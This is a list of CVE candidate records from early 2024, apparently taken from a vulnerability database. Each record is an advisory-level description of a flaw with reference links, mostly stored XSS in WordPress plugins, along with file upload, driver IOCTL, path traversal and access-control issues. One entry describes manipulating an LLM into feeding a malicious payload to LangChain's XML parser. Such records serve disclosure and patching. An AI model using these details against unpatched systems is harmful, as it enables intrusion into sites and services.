CVE    2024    1468    Candidate    The Avada | Website Builder For WordPress & WooCommerce theme for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the ajax_import_options() function in all versions up to, and including, 7.11.4. This makes it possible for authenticated attackers, with contributor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.    MISC:https://avada.com/documentation/avada-changelog/   |   URL:https://avada.com/documentation/avada-changelog/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/cde6e758-9723-43f2-9972-32be8aeb2b91?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/cde6e758-9723-43f2-9972-32be8aeb2b91?source=cve    Assigned (20240213)
CVE    2024    1462    Candidate    The Maintenance Page plugin for WordPress is vulnerable to Basic Information Exposure in all versions up to, and including, 1.0.8 via the REST API. This makes it possible for unauthenticated attackers to view post titles and content when the site is in maintenance mode.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037664%40maintenance-page%2Ftrunk&old=1218033%40maintenance-page%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037664%40maintenance-page%2Ftrunk&old=1218033%40maintenance-page%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/653bf021-370d-4787-9ded-c5c915aed1d6?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/653bf021-370d-4787-9ded-c5c915aed1d6?source=cve    Assigned (20240212)
CVE    2024    1460    Candidate    MSI Afterburner v4.6.5.16370 is vulnerable to a Kernel Memory Leak vulnerability by triggering the 0x80002040 IOCTL code of the RTCore64.sys driver. The handle to the driver can only be obtained from a high integrity process.    MISC:https://fluidattacks.com/advisories/mingus/   |   URL:https://fluidattacks.com/advisories/mingus/   |   MISC:https://www.msi.com/Landing/afterburner/graphics-cards   |   URL:https://www.msi.com/Landing/afterburner/graphics-cards    Assigned (20240212)
CVE    2024    1459    Candidate    A path traversal vulnerability was found in Undertow. This issue may allow a remote attacker to append a specially-crafted sequence to an HTTP request for an application deployed to JBoss EAP, which may permit access to privileged or restricted files and directories.    MISC:RHBZ#2259475   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2259475   |   MISC:https://access.redhat.com/security/cve/CVE-2024-1459   |   URL:https://access.redhat.com/security/cve/CVE-2024-1459    Assigned (20240212)
CVE    2024    1455    Candidate    The XMLOutputParser in LangChain uses the etree module from the XML parser in the standard Python library which has some XML vulnerabilities; see: https://docs.python.org/3/library/xml.html This primarily affects users that combine an LLM (or agent) with the `XMLOutputParser` and expose the component via an endpoint on a web-service. This would allow a malicious party to attempt to manipulate the LLM to produce a malicious payload for the parser that would compromise the availability of the service. A successful attack is predicated on: 1. Usage of XMLOutputParser 2. Passing of malicious input into the XMLOutputParser either directly or by trying to manipulate an LLM to do so on the user's behalf 3. Exposing the component via a web-service    MISC:https://huntr.com/bounties/4353571f-c70d-4bfd-ac08-3a89cecb45b6   |   URL:https://huntr.com/bounties/4353571f-c70d-4bfd-ac08-3a89cecb45b6    Assigned (20240212)
CVE    2024    1454    Candidate    The use-after-free vulnerability was found in the AuthentIC driver in OpenSC packages, occurring in the card enrolment process using pkcs15-init when a user or administrator enrols or modifies cards. An attacker must have physical access to the computer system and requires a crafted USB device or smart card to present the system with specially crafted responses to the APDUs, which are considered high complexity and low severity. This manipulation can allow for compromised card management operations during enrolment.    FEDORA:FEDORA-2024-3dbc3e8105   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UECKC7X4IM4YZQ5KRQMNBNKNOXLZC7RZ/   |   FEDORA:FEDORA-2024-6460a03e29   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RJI2FWLY24EOPALQ43YPQEZMEP3APPPI/   |   FEDORA:FEDORA-2024-b92d44f141   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OWIZ5ZLO5ECYPLSTESCF7I7PQO5X6ZSU/   |   MISC:RHBZ#2263929   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2263929   |   MISC:https://access.redhat.com/security/cve/CVE-2024-1454   |   URL:https://access.redhat.com/security/cve/CVE-2024-1454   |   MISC:https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=64898   |   URL:https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=64898   |   MISC:https://github.com/OpenSC/OpenSC/commit/5835f0d4f6c033bd58806d33fa546908d39825c9   |   URL:https://github.com/OpenSC/OpenSC/commit/5835f0d4f6c033bd58806d33fa546908d39825c9    Assigned (20240212)
CVE    2024    1453    Candidate    In Sante DICOM Viewer Pro versions 14.0.3 and prior, a user must open a malicious DICOM file, which could allow a local attacker to disclose information or execute arbitrary code.    MISC:https://www.cisa.gov/news-events/ics-medical-advisories/icsma-24-058-01   |   URL:https://www.cisa.gov/news-events/ics-medical-advisories/icsma-24-058-01    Assigned (20240212)
CVE    2024    1452    Candidate    The GenerateBlocks plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.8.2 via Query Loop. This makes it possible for authenticated attackers, with contributor access and above, to see contents of posts and pages in draft or private status as well as those with scheduled publication dates.    MISC:https://plugins.trac.wordpress.org/browser/generateblocks/trunk/includes/class-query-loop.php#L140   |   URL:https://plugins.trac.wordpress.org/browser/generateblocks/trunk/includes/class-query-loop.php#L140   |   MISC:https://plugins.trac.wordpress.org/browser/generateblocks/trunk/includes/class-query-loop.php#L70   |   URL:https://plugins.trac.wordpress.org/browser/generateblocks/trunk/includes/class-query-loop.php#L70   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3041431%40generateblocks%2Ftrunk&old=2995923%40generateblocks%2Ftrunk&sfp_email=&sfph_mail=#file2   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3041431%40generateblocks%2Ftrunk&old=2995923%40generateblocks%2Ftrunk&sfp_email=&sfph_mail=#file2   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/62f19301-2311-4989-a5f2-9f845b72dd54?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/62f19301-2311-4989-a5f2-9f845b72dd54?source=cve    Assigned (20240212)
CVE    2024    1451    Candidate    An issue has been discovered in GitLab CE/EE affecting all versions starting from 16.9 before 16.9.1. A crafted payload added to the user profile page could lead to a stored XSS on the client side, allowing attackers to perform arbitrary actions on behalf of victims.    MISC:GitLab Issue #441457   |   URL:https://gitlab.com/gitlab-org/gitlab/-/issues/441457   |   MISC:HackerOne Bug Bounty Report #2371126   |   URL:https://hackerone.com/reports/2371126    Assigned (20240212)
CVE    2024    1450    Candidate    The Shariff Wrapper plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'shariff' shortcode in all versions up to, and including, 4.6.10 due to insufficient input sanitization and output escaping on user supplied attributes such as 'align'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/shariff/tags/4.6.10/shariff.php   |   URL:https://plugins.trac.wordpress.org/browser/shariff/tags/4.6.10/shariff.php   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3047668%40shariff&new=3047668%40shariff&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3047668%40shariff&new=3047668%40shariff&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/00a3d8e3-17b1-488b-9c42-2479932c9bf7?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/00a3d8e3-17b1-488b-9c42-2479932c9bf7?source=cve    Assigned (20240212)
CVE    2024    1449    Candidate    The Master Slider – Responsive Touch Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ms_slide shortcode in all versions up to, and including, 3.9.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://wordpress.org/plugins/master-slider/   |   URL:https://wordpress.org/plugins/master-slider/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/af9adb6b-f726-4b74-be5c-82fdab0ae1f2?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/af9adb6b-f726-4b74-be5c-82fdab0ae1f2?source=cve    Assigned (20240212)
CVE    2024    1448    Candidate    The Social Sharing Plugin – Sassy Social Share plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 3.3.56 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/sassy-social-share/tags/3.3.56/includes/class-sassy-social-share-shortcodes.php   |   URL:https://plugins.trac.wordpress.org/browser/sassy-social-share/tags/3.3.56/includes/class-sassy-social-share-shortcodes.php   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3038227%40sassy-social-share%2Ftrunk&old=2996153%40sassy-social-share%2Ftrunk&sfp_email=&sfph_mail=#file8   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3038227%40sassy-social-share%2Ftrunk&old=2996153%40sassy-social-share%2Ftrunk&sfp_email=&sfph_mail=#file8   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/1c2f4b74-2568-4e5a-b55f-0130096bc19f?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/1c2f4b74-2568-4e5a-b55f-0130096bc19f?source=cve    Assigned (20240212)
CVE    2024    1447    Candidate    The Sydney Toolbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's aThemes Slider button element in all versions up to, and including, 1.25 due to insufficient input sanitization and output escaping on user supplied link. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/sydney-toolbox/trunk/inc/elementor/block-slider.php#L679   |   URL:https://plugins.trac.wordpress.org/browser/sydney-toolbox/trunk/inc/elementor/block-slider.php#L679   |   MISC:https://plugins.trac.wordpress.org/browser/sydney-toolbox/trunk/inc/elementor/block-slider.php#L692   |   URL:https://plugins.trac.wordpress.org/browser/sydney-toolbox/trunk/inc/elementor/block-slider.php#L692   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3035233%40sydney-toolbox%2Ftrunk&old=2980978%40sydney-toolbox%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3035233%40sydney-toolbox%2Ftrunk&old=2980978%40sydney-toolbox%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/1227f3bc-0bb3-4b80-ad69-2d4314fafbe4?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/1227f3bc-0bb3-4b80-ad69-2d4314fafbe4?source=cve    Assigned (20240212)
CVE    2024    1445    Candidate    The Page scroll to id plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.7.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/page-scroll-to-id/tags/1.7.8/includes/malihu-pagescroll2id-shortcodes-php52.php   |   URL:https://plugins.trac.wordpress.org/browser/page-scroll-to-id/tags/1.7.8/includes/malihu-pagescroll2id-shortcodes-php52.php   |   MISC:https://plugins.trac.wordpress.org/browser/page-scroll-to-id/tags/1.7.8/includes/malihu-pagescroll2id-shortcodes.php   |   URL:https://plugins.trac.wordpress.org/browser/page-scroll-to-id/tags/1.7.8/includes/malihu-pagescroll2id-shortcodes.php   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3035333%40page-scroll-to-id%2Ftrunk&old=3034857%40page-scroll-to-id%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3035333%40page-scroll-to-id%2Ftrunk&old=3034857%40page-scroll-to-id%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/c0d5f034-fd8b-456a-b44a-7d82db3a16a0?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/c0d5f034-fd8b-456a-b44a-7d82db3a16a0?source=cve    Assigned (20240212)
CVE    2024    1444    Candidate    ** REJECT ** Erroneous assignment        Assigned (20240212)
CVE    2024    1443    Candidate    MSI Afterburner v4.6.5.16370 is vulnerable to a Denial of Service vulnerability by triggering the 0x80002000 IOCTL code of the RTCore64.sys driver. The handle to the driver can only be obtained from a high integrity process.    MISC:https://fluidattacks.com/advisories/coltrane/   |   URL:https://fluidattacks.com/advisories/coltrane/   |   MISC:https://www.msi.com/Landing/afterburner/graphics-cards   |   URL:https://www.msi.com/Landing/afterburner/graphics-cards    Assigned (20240212)
CVE    2024    1442    Candidate    A user with the permissions to create a data source can use Grafana API to create a data source with UID set to *. Doing this will grant the user access to read, query, edit and delete all data sources within the organization.    MISC:https://grafana.com/security/security-advisories/cve-2024-1442/   |   URL:https://grafana.com/security/security-advisories/cve-2024-1442/    Assigned (20240212)
CVE    2024    1441    Candidate    An off-by-one error flaw was found in the udevListInterfacesByStatus() function in libvirt when the number of interfaces exceeds the size of the `names` array. This issue can be reproduced by sending specially crafted data to the libvirt daemon, allowing an unprivileged client to perform a denial of service attack by causing the libvirt daemon to crash.    FEDORA:FEDORA-2024-d96cdeb8ec   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/45FFKU3LODT345LAB5T4XZA5WKYMXJYU/   |   MISC:RHBZ#2263841   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2263841   |   MISC:https://access.redhat.com/security/cve/CVE-2024-1441   |   URL:https://access.redhat.com/security/cve/CVE-2024-1441    Assigned (20240212)
CVE    2024    1439    Candidate    Inadequate access control in Moodle LMS. This vulnerability could allow a local user with a student role to create arbitrary events intended for users with higher roles. It could also allow the attacker to add events to the calendar of all users without their prior consent.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/inadequate-access-control-vulnerability-moodle   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/inadequate-access-control-vulnerability-moodle    Assigned (20240212)
CVE    2024    1437    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in José Fernandez Adsmonetizer allows Reflected XSS. This issue affects Adsmonetizer: from n/a through 3.1.2.    MISC:https://patchstack.com/database/vulnerability/adsensei-b30/wordpress-adsmonetizer-plugin-3-1-2-reflected-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/adsensei-b30/wordpress-adsmonetizer-plugin-3-1-2-reflected-xss-vulnerability?_s_id=cve    Assigned (20240212)
CVE    2024    1436    Candidate    Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Wiloke WooCommerce Coupon Popup, SmartBar, Slide In | MyShopKit. This issue affects WooCommerce Coupon Popup, SmartBar, Slide In | MyShopKit: from n/a through 1.0.9.    MISC:https://patchstack.com/database/vulnerability/myshopkit-popup-smartbar-slidein/wordpress-woocommerce-myshopkit-plugin-1-0-9-sensitive-data-exposure-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/myshopkit-popup-smartbar-slidein/wordpress-woocommerce-myshopkit-plugin-1-0-9-sensitive-data-exposure-vulnerability?_s_id=cve    Assigned (20240212)
CVE    2024    1435    Candidate    Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Tainacan.Org Tainacan. This issue affects Tainacan: from n/a through 0.20.6.    MISC:https://patchstack.com/database/vulnerability/tainacan/wordpress-tainacan-plugin-0-20-6-sensitive-data-exposure-via-log-file-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/tainacan/wordpress-tainacan-plugin-0-20-6-sensitive-data-exposure-via-log-file-vulnerability?_s_id=cve    Assigned (20240212)
CVE    2024    1434    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jordy Meow Media Alt Renamer allows Stored XSS. This issue affects Media Alt Renamer: from n/a through 0.0.1.    MISC:https://patchstack.com/database/vulnerability/media-alt-renamer/wordpress-media-alt-renamer-plugin-0-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/media-alt-renamer/wordpress-media-alt-renamer-plugin-0-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240212)
CVE    2024    1433    Candidate    A vulnerability, which was classified as problematic, was found in KDE Plasma Workspace up to 5.93.0. This affects the function EventPluginsManager::enabledPlugins of the file components/calendar/eventpluginsmanager.cpp of the component Theme File Handler. The manipulation of the argument pluginId leads to path traversal. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The patch is named 6cdf42916369ebf4ad5bd876c4dfa0170d7b2f01. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-253407. NOTE: This requires write access to user's home or the installation of third party global themes.    MISC:https://github.com/KDE/plasma-workspace/commit/6cdf42916369ebf4ad5bd876c4dfa0170d7b2f01   |   URL:https://github.com/KDE/plasma-workspace/commit/6cdf42916369ebf4ad5bd876c4dfa0170d7b2f01   |   MISC:https://vuldb.com/?ctiid.253407   |   URL:https://vuldb.com/?ctiid.253407   |   MISC:https://vuldb.com/?id.253407   |   URL:https://vuldb.com/?id.253407    Assigned (20240211)
CVE    2024    1432    Candidate    ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in DeepFaceLab pretrained DF.wf.288res.384.92.72.22 and classified as problematic. This issue affects the function apply_xseg of the file main.py. The manipulation leads to deserialization. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-253391. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.    MISC:https://github.com/bayuncao/vul-cve-12   |   URL:https://github.com/bayuncao/vul-cve-12   |   MISC:https://vuldb.com/?ctiid.253391   |   URL:https://vuldb.com/?ctiid.253391   |   MISC:https://vuldb.com/?id.253391   |   URL:https://vuldb.com/?id.253391    Assigned (20240210)
CVE    2024    1431    Candidate    A vulnerability was found in Netgear R7000 1.0.11.136_10.2.120 and classified as problematic. Affected by this issue is some unknown functionality of the file /debuginfo.htm of the component Web Management Interface. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. VDB-253382 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/leetsun/Hints/tree/main/R7000/2   |   URL:https://github.com/leetsun/Hints/tree/main/R7000/2   |   MISC:https://vuldb.com/?ctiid.253382   |   URL:https://vuldb.com/?ctiid.253382   |   MISC:https://vuldb.com/?id.253382   |   URL:https://vuldb.com/?id.253382    Assigned (20240210)
CVE    2024    1430    Candidate    A vulnerability has been found in Netgear R7000 1.0.11.136_10.2.120 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /currentsetting.htm of the component Web Management Interface. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. The identifier VDB-253381 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/leetsun/Hints/tree/main/R7000/1   |   URL:https://github.com/leetsun/Hints/tree/main/R7000/1   |   MISC:https://vuldb.com/?ctiid.253381   |   URL:https://vuldb.com/?ctiid.253381   |   MISC:https://vuldb.com/?id.253381   |   URL:https://vuldb.com/?id.253381    Assigned (20240210)
CVE    2024    1425    Candidate    The EmbedPress – Embed PDF, YouTube, Google Docs, Vimeo, Wistia Videos, Audios, Maps & Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Google Calendar Widget Link in all versions up to, and including, 3.9.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/embedpress/tags/3.9.8/EmbedPress/Elementor/Widgets/Embedpress_Calendar.php#L314   |   URL:https://plugins.trac.wordpress.org/browser/embedpress/tags/3.9.8/EmbedPress/Elementor/Widgets/Embedpress_Calendar.php#L314   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3035539%40embedpress%2Ftrunk&old=3029957%40embedpress%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3035539%40embedpress%2Ftrunk&old=3029957%40embedpress%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/4d4568c8-f58c-4c37-94b9-6154e5c46928?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/4d4568c8-f58c-4c37-94b9-6154e5c46928?source=cve    Assigned (20240209)
CVE    2024    1423    Candidate    ** REJECT ** Accidental Request        Assigned (20240209)
CVE    2024    1422    Candidate    The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the modal popup widget's effect setting in all versions up to, and including, 1.12.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/trunk/modules/modal-popup/widgets/modal-popup.php#L1048   |   URL:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/trunk/modules/modal-popup/widgets/modal-popup.php#L1048   |   MISC:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/trunk/modules/modal-popup/widgets/modal-popup.php#L1062   |   URL:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/trunk/modules/modal-popup/widgets/modal-popup.php#L1062   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037925%40addon-elements-for-elementor-page-builder%2Ftrunk&old=3031349%40addon-elements-for-elementor-page-builder%2Ftrunk&sfp_email=&sfph_mail=#file26   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037925%40addon-elements-for-elementor-page-builder%2Ftrunk&old=3031349%40addon-elements-for-elementor-page-builder%2Ftrunk&sfp_email=&sfph_mail=#file26   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/4ba28184-b5c3-4a5c-a376-29b3c6a2aa20?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/4ba28184-b5c3-4a5c-a376-29b3c6a2aa20?source=cve    Assigned (20240209)
CVE    2024    1421    Candidate    The HT Mega – Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘border_type’ attribute of the Post Carousel widget in all versions up to, and including, 2.4.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/ht-mega-for-elementor/tags/2.4.4/includes/widgets/htmega_post_carousel.php#L2243   |   URL:https://plugins.trac.wordpress.org/browser/ht-mega-for-elementor/tags/2.4.4/includes/widgets/htmega_post_carousel.php#L2243   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a71cbe66-4187-4260-bb87-8579bc6e75f5?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a71cbe66-4187-4260-bb87-8579bc6e75f5?source=cve    Assigned (20240209)
CVE    2024    1420    Candidate    ** REJECT ** This is a duplicate of CVE-2024-1049. Please use CVE-2024-1049 instead.        Assigned (20240209)
CVE    2024    1419    Candidate    The The Plus Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘_id’ attribute of the Header Meta Content widget in all versions up to, and including, 5.4.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3043999/the-plus-addons-for-elementor-page-builder   |   URL:https://plugins.trac.wordpress.org/changeset/3043999/the-plus-addons-for-elementor-page-builder   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d0b3d83b-9695-40c5-b6ee-2a76c940de6e?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d0b3d83b-9695-40c5-b6ee-2a76c940de6e?source=cve    Assigned (20240209)
CVE    2024    1414    Candidate    The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Call To Action widget in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3042217/exclusive-addons-for-elementor   |   URL:https://plugins.trac.wordpress.org/changeset/3042217/exclusive-addons-for-elementor   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6a12acf0-932e-4dff-9da6-9fbace11dbe1?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6a12acf0-932e-4dff-9da6-9fbace11dbe1?source=cve    Assigned (20240209)
CVE    2024    1413    Candidate    The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Countdown Timer widget in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3042217/exclusive-addons-for-elementor   |   URL:https://plugins.trac.wordpress.org/changeset/3042217/exclusive-addons-for-elementor   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/f40956e0-6e5c-4965-84f8-2420ad14a299?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/f40956e0-6e5c-4965-84f8-2420ad14a299?source=cve    Assigned (20240209)
CVE    2024    1411    Candidate    The PowerPack Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the settings of the Twitter Buttons Widget in all versions up to, and including, 2.7.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3035790/powerpack-lite-for-elementor   |   URL:https://plugins.trac.wordpress.org/changeset/3035790/powerpack-lite-for-elementor   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/64480862-c076-4ea9-a03b-9aed81f876d5?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/64480862-c076-4ea9-a03b-9aed81f876d5?source=cve    Assigned (20240209)
CVE    2024    1410    Candidate    Cloudflare quiche was discovered to be vulnerable to unbounded storage of information related to connection ID retirement, which could lead to excessive resource consumption. Each QUIC connection possesses a set of connection Identifiers (IDs); see RFC 9000 Section 5.1 https://datatracker.ietf.org/doc/html/rfc9000#section-5.1 . Endpoints declare the number of active connection IDs they are willing to support using the active_connection_id_limit transport parameter. The peer can create new IDs using a NEW_CONNECTION_ID frame but must stay within the active ID limit. This is done by retiring old IDs: the endpoint sends a NEW_CONNECTION_ID frame that includes a value in the retire_prior_to field, which elicits a RETIRE_CONNECTION_ID frame as confirmation. An unauthenticated remote attacker can exploit the vulnerability by sending NEW_CONNECTION_ID frames and manipulating the connection (e.g. by restricting the peer's congestion window size) so that RETIRE_CONNECTION_ID frames can only be sent at a slower rate than they are received, leading to storage of information related to connection IDs in an unbounded queue. Quiche versions 0.19.2 and 0.20.1 are the earliest to address this problem. There is no workaround for affected versions.    MISC:https://github.com/cloudflare/quiche/security/advisories/GHSA-xhg9-xwch-vr7x   |   URL:https://github.com/cloudflare/quiche/security/advisories/GHSA-xhg9-xwch-vr7x    Assigned (20240209)
CVE    2024    1409    Candidate    The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's [reg-select-role] shortcode in all versions up to, and including, 4.15.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3038677%40wp-user-avatar&new=3038677%40wp-user-avatar&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3038677%40wp-user-avatar&new=3038677%40wp-user-avatar&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/53e16bca-7c85-4d56-8233-b3b53f793b39?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/53e16bca-7c85-4d56-8233-b3b53f793b39?source=cve    Assigned (20240209)
